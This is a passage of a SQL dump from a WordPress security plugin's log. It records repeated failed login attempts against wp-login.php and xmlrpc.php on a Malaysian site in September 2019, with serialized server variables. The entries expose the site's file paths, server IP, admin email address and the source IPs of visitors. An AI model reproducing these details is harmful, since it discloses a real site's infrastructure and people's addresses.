05:01:49',17744728,19231152,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24400,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"42452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBovNVIJ66zPtjtaf0FMwAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696508.9325\";s:12:\"REQUEST_TIME\";s:10:\"1568696508\";}}','notice','2019-09-17 05:01:50','2019-09-17 05:01:49',17906064,19231152,'https://bintara.com.my/wp-login.php',1,0,'188.213.19.83'),(24401,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"188.213.19.83\";s:11:\"REMOTE_PORT\";s:5:\"43086\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBov9VIJ66zPtjtaf0FNQAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568696512.0403\";s:12:\"REQUEST_TIME\";s:10:\"1568696512\";}}','notice','2019-09-17 05:01:53','2019-09-17 05:01:52',18256064,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'188.213.19.83'),(24402,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"49604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBqwR@uZ4OC5N1Fn8FDWwAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697025.8992\";s:12:\"REQUEST_TIME\";s:10:\"1568697025\";}}','notice','2019-09-17 05:10:27','2019-09-17 05:10:26',17740072,19229952,'https://bintara.com.my/wp-login.php',1,0,'162.144.123.107'),(24403,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.123.107\";s:11:\"REMOTE_PORT\";s:5:\"50254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBqxNVIJ66zPtjtaf0HbgAAAU4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697028.8175\";s:12:\"REQUEST_TIME\";s:10:\"1568697028\";}}','notice','2019-09-17 05:10:30','2019-09-17 05:10:29',18256408,19555304,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.123.107'),(24404,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"17405\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBr6NK-omY048@iBsMuRQAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697321.0669\";s:12:\"REQUEST_TIME\";s:10:\"1568697321\";}}','notice','2019-09-17 05:15:22','2019-09-17 05:15:21',17739800,19230024,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(24405,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"18225\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBr7NVIJ66zPtjtaf0ICwAAAVI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697324.1879\";s:12:\"REQUEST_TIME\";s:10:\"1568697324\";}}','notice','2019-09-17 05:15:25','2019-09-17 05:15:24',18256168,19556128,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(24406,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"34490\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBsf9VIJ66zPtjtaf0IXgAAAVY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697471.0913\";s:12:\"REQUEST_TIME\";s:10:\"1568697471\";}}','notice','2019-09-17 05:17:52','2019-09-17 05:17:51',17739696,19230488,'https://bintara.com.my/wp-login.php',1,0,'35.188.77.30'),(24407,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"35.188.77.30\";s:11:\"REMOTE_PORT\";s:5:\"34855\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBsgbIp53uPsY7BKArP1AAAAFY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697473.7682\";s:12:\"REQUEST_TIME\";s:10:\"1568697473\";}}','notice','2019-09-17 05:17:55','2019-09-17 05:17:54',18255936,19555096,'https://bintara.com.my/xmlrpc.php',1,0,'35.188.77.30'),(24408,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.136.84\";s:11:\"REMOTE_PORT\";s:5:\"44774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBuVh@uZ4OC5N1Fn8FEWgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568697943.0332\";s:12:\"REQUEST_TIME\";s:10:\"1568697943\";}}','notice','2019-09-17 05:25:44','2019-09-17 